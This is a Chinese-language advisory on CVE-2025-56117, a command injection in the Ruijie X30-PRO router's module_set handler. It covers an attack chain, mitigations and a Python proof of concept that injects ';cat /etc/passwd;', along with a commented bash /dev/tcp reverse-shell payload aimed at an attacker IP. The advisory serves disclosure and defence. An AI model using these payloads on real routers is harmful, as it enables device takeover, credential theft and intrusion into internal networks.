CVE-2025-56117 | 锐捷X30-PRO路由器OS命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-56117

漏洞类型

OS命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ruijie X30-PRO (X30-PRO-V1_09241521)

漏洞概述

CVE-2025-56117是锐捷网络（Ruijie Networks）生产的X30-PRO路由器中存在的一个严重的操作系统命令注入漏洞。该漏洞位于路由器的Web管理界面模块中，具体存在于文件/usr/local/lua/dev_sta/nbr_cwmp.lua的module_set功能处。攻击者可以通过构造恶意的POST请求，在未经充分验证的情况下将任意操作系统命令注入到底层系统执行。由于该漏洞的CVSS评分达到8.8，属于高危级别，且攻击向量为网络可达，认证要求较低（低权限用户即可利用），因此对暴露在网络中的锐捷X30-PRO设备构成严重威胁。攻击成功后，攻击者可以完全控制受影响的路由器设备，执行任意系统命令，可能导致数据泄露、恶意固件植入、网络流量劫持或进一步横向渗透到内网其他系统。此漏洞无需用户交互即可实现攻击，这大大降低了攻击者的利用门槛。该漏洞由[email protected]于2025年12月11日披露，漏洞类型为命令注入（Command Injection），影响设备的机密性、完整性和可用性均为高影响级别。

技术细节

该漏洞的根本原因在于锐捷X30-PRO路由器的Lua脚本模块在处理用户输入时缺乏有效的输入验证和安全过滤机制。具体来说，问题出现在/usr/local/lua/dev_sta/nbr_cwmp.lua文件中的module_set函数。当Web管理界面接收用户提交的POST请求参数时，程序直接将用户可控的参数值传递给系统命令执行函数，而未对特殊字符（如分号、管道符、反引号等）进行过滤或转义处理。攻击者可以利用这一缺陷，在POST请求的module_set参数中注入任意操作系统命令。例如，通过在参数值中插入分号后跟其他系统命令（如ls、cat、wget等），攻击者可以在路由器上执行任意代码。由于该功能位于路由器的管理接口，攻击者需要具有低权限账户或通过其他方式获得访问权限即可发起攻击。攻击成功后，攻击者以路由器的运行权限（通常是root权限）执行命令，从而完全控制设备。攻击者可能利用此漏洞读取敏感配置文件、植入后门程序、修改路由表或进一步利用路由器作为跳板攻击内网中的其他设备。修复此漏洞需要对用户输入进行严格的参数化处理或使用安全的API来避免命令注入。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先识别目标锐捷X30-PRO路由器，确认设备IP地址和Web管理接口是否可通过网络访问。攻击者可能使用搜索引擎（如Shodan、Censys）或网络扫描工具发现暴露在互联网或有风险的内网环境中的易受攻击设备。

STEP 2

步骤2: 身份认证

攻击者获取路由器的低权限账户凭据。CVSS向量显示此漏洞需要低权限认证（PR:L），因此攻击者可能通过默认凭据、暴力破解或社工手段获得一个普通用户账户的访问权限。

STEP 3

步骤3: 构造恶意请求

攻击者构造包含恶意命令注入载荷的POST请求。载荷通过在module_set参数中插入分号等Shell特殊字符，后跟待执行的系统命令（如cat、ls、wget、反向shell命令等），绕过输入验证直接注入到系统命令执行函数。

STEP 4

步骤4: 发送攻击载荷

攻击者将构造好的恶意POST请求发送到路由器的/cgi-bin/module_set或相应的API端点。由于攻击通过网络发起（AV:N），且无需用户交互（UI:N），攻击可以在受害者不知情的情况下完成。

STEP 5

步骤5: 命令执行

路由器上的Lua脚本接收到恶意请求后，由于缺乏输入过滤，直接将用户输入拼接到系统命令中执行。注入的命令以路由器的高权限（通常是root）运行，导致攻击者获得完全的系统控制权。

STEP 6

步骤6: 持久化与横向移动

攻击者成功执行命令后，可能植入后门程序保持持久访问，窃取敏感配置信息或会话数据，修改路由规则进行流量劫持，或以路由器为跳板进一步攻击内网中的其他设备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-56117 PoC - Ruijie X30-PRO OS Command Injection
# Target: Ruijie X30-PRO router with vulnerable module_set endpoint
# Reference: /usr/local/lua/dev_sta/nbr_cwmp.lua

target_url = "http://<target_ip>/cgi-bin/module_set"

# Malicious payload to execute arbitrary command
# Inject: cat /etc/passwd to verify command execution
payload = {
    "module_set": ";cat /etc/passwd;"
}

try:
    response = requests.post(target_url, data=payload, timeout=10)
    print(f"Status Code: {response.status_code}")
    print(f"Response:\n{response.text}")
except requests.exceptions.RequestException as e:
    print(f"Request failed: {e}")

# Example: Reverse shell payload
# payload = {"module_set": ";bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1;"}

影响范围

Ruijie X30-PRO X30-PRO-V1_09241521

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）禁用或限制路由器的远程Web管理接口访问，仅允许受信任的IP地址访问管理后台；2）使用强密码策略并定期更换路由器管理账户密码；3）在网络层部署严格的访问控制列表（ACL），阻止未授权访问管理接口；4）启用路由器的安全日志功能，监控异常的HTTP请求和命令执行行为；5）考虑使用VPN或专用网络通道进行设备管理，避免管理接口直接暴露在公网或不可信网络中；6）如果业务允许，暂时停止使用受影响设备的Web管理功能，改用其他安全管理方式。